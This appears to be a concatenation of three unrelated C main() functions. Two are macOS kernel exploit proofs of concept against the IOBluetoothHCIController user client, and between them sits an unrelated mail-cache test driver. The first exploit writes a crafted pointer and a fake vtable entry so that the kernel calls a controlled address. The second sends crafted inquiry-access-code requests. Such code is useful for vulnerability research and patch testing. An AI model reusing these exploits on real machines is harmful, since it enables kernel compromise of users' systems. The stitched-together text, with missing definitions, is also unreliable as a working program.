int main(void) {
struct BluetoothCall a;
int i;
void *landing_page = calloc(SIZE, sizeof(char));
/* Init a */
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
/* Populating with fake requests. */
create_requests(port);
/* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
a.index = 42;
/* Req number */
*((uint32_t *)a.args[0]) = 1;
/* num_of_keys */
*((uint32_t *)a.args[1]) = 0x20;
/* Padding */
memset((void *)a.args[3], 0x33, 152);
/* mov rdi, [r14+0AB8h] */
*((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
/* mov rax, [rdi] */
*((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
/* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
*((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;
/* Here some fixing to the vtable is required to return cleanly after the exploit */
#if 0
/* Debug print */
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
#endif
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
int main(int argc, char **argv)
{
DICT_CACHE_TEST *test_job;
VSTRING *inbuf = vstring_alloc(100);
char *bufp;
ARGV *args;
DICT_CACHE *cache = 0;
int stdin_is_tty;
msg_vstream_init(argv[0], VSTREAM_ERR);
if (argc != 1)
usage(argv[0]);
test_job = create_requests(DICT_CACHE_SREQ_LIMIT);
stdin_is_tty = isatty(0);
for (;;) {
if (stdin_is_tty) {
vstream_printf("> ");
vstream_fflush(VSTREAM_OUT);
}
if (vstring_fgets_nonl(inbuf, VSTREAM_IN) == 0)
break;
bufp = vstring_str(inbuf);
if (!stdin_is_tty) {
vstream_printf("> %s\n", bufp);
vstream_fflush(VSTREAM_OUT);
}
if (*bufp == '#')
continue;
args = argv_split(bufp, DELIMS);
if (argc == 0) {
vstream_printf("usage: %s\n", USAGE);
vstream_fflush(VSTREAM_OUT);
continue;
}
if (strcmp(args->argv[0], "verbose") == 0 && args->argc == 2) {
msg_verbose = atoi(args->argv[1]);
} else if (strcmp(args->argv[0], "elapsed") == 0 && args->argc == 2) {
show_elapsed = atoi(args->argv[1]);
#ifdef HAS_LMDB
} else if (strcmp(args->argv[0], "lmdb_map_size") == 0 && args->argc == 2) {
dict_lmdb_map_size = atol(args->argv[1]);
#endif
} else if (strcmp(args->argv[0], "cache") == 0 && args->argc == 2) {
if (cache)
dict_cache_close(cache);
cache = dict_cache_open(args->argv[1], O_CREAT | O_RDWR,
DICT_CACHE_OPEN_FLAGS);
} else if (strcmp(args->argv[0], "reset") == 0 && args->argc == 1) {
reset_requests(test_job);
} else if (strcmp(args->argv[0], "run") == 0 && args->argc == 1) {
run_requests(test_job, cache, inbuf);
} else if (strcmp(args->argv[0], "status") == 0 && args->argc == 1) {
show_status(test_job, cache);
} else {
add_request(test_job, args);
}
vstream_fflush(VSTREAM_OUT);
argv_free(args);
}
vstring_free(inbuf);
free_requests(test_job);
if (cache)
dict_cache_close(cache);
return (0);
}
int main(void) {
BluetoothCall a;
BluetoothHCICurrentInquiryAccessCodes codes;
BluetoothHCICurrentInquiryAccessCode *buffer;
int i = 0;
/* Init a */
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] populating ...\n");
create_requests(port);
printf(" [+] done!\n");
/* DispatchHCIBluetoothHCIWriteCurrentIACLAP() */
a.index = 80;
/* Params */
*((uint32_t *)a.args[0]) = 100; /* Req number */
codes.count = 0x10;
buffer = calloc(0x10, sizeof(BluetoothHCICurrentInquiryAccessCode));
codes.codes = buffer;
a.args[1] = (uint64_t) &codes;
a.sizes[1] = sizeof(codes);
#ifdef DEBUG
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
#endif
printf(" [+] Calling DispatchHCIBluetoothHCIWriteCurrentIACLAP()\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf(" [+] kr: %x\n", kr);
/* DispatchHCIBluetoothHCIReadCurrentIACLAP() */
a.index = 79;
/* Params */
*((uint32_t *)a.args[0]) = 100; /* Request Number */
a.args[1] = (uint64_t) &codes;
a.sizes[1] = sizeof(codes);
#ifdef DEBUG
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
#endif
printf(" [+] Calling DispatchHCIBluetoothHCIReadCurrentIACLAP()\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf(" [+] kr: %x\n", kr);
IOServiceClose(port);
return 0;
}